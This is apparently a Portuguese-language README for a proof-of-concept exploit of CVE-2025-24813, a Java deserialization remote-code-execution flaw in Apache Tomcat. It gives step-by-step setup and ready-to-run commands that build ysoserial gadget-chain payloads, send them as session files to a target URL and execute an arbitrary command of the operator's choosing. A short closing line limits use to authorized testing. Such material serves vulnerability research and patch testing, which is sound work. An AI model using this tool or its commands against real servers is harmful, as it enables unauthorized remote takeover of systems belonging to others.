
Exploit de prova de conceito para CVE-2025-24813, uma vulnerabilidade de desserialização Java no Apache Tomcat. Gera payloads serializados maliciosos e os envia como arquivos de sessão para desencadear execução remota de código.
Este repositório contém um exploit de prova de conceito para CVE-2025-24813, uma vulnerabilidade de desserialização Java no Apache Tomcat.
Baseado em absholi7ly/POC-CVE-2025-24813/.
Instalar dependências:
uv venv
source .venv/bin/activate
uv sync
Baixar ysoserial:
./download.sh
Construir e executar o exploit em um container:
docker build -t cve-2025-24813-poc:latest .
docker run --rm -it --mount "type=bind,src=$(pwd),target=/app" cve-2025-24813-poc:latest
python main.py <target>
Executar o exploit diretamente:
python main.py <target_url> [options]
--command: Comando a ser executado (padrão: calc.exe)--ysoserial: Caminho para ysoserial.jar (padrão: ./ysoserial-all.jar)--gadget: Cadeia de gadget do ysoserial (padrão: CommonsCollections6)--payload_type: Tipo de payload - ysoserial ou java (padrão: ysoserial)--no-ssl-verify: Desabilitar verificação SSL# Basic usage
python main.py http://target:8080
# Custom command
python main.py http://target:8080 --command "whoami"
# Using Java payload instead of ysoserial
python main.py http://target:8080 --payload_type java
Esta ferramenta é apenas para fins educacionais e de teste autorizado. Não use contra sistemas que você não possui ou para os quais não tenha permissão explícita para testar.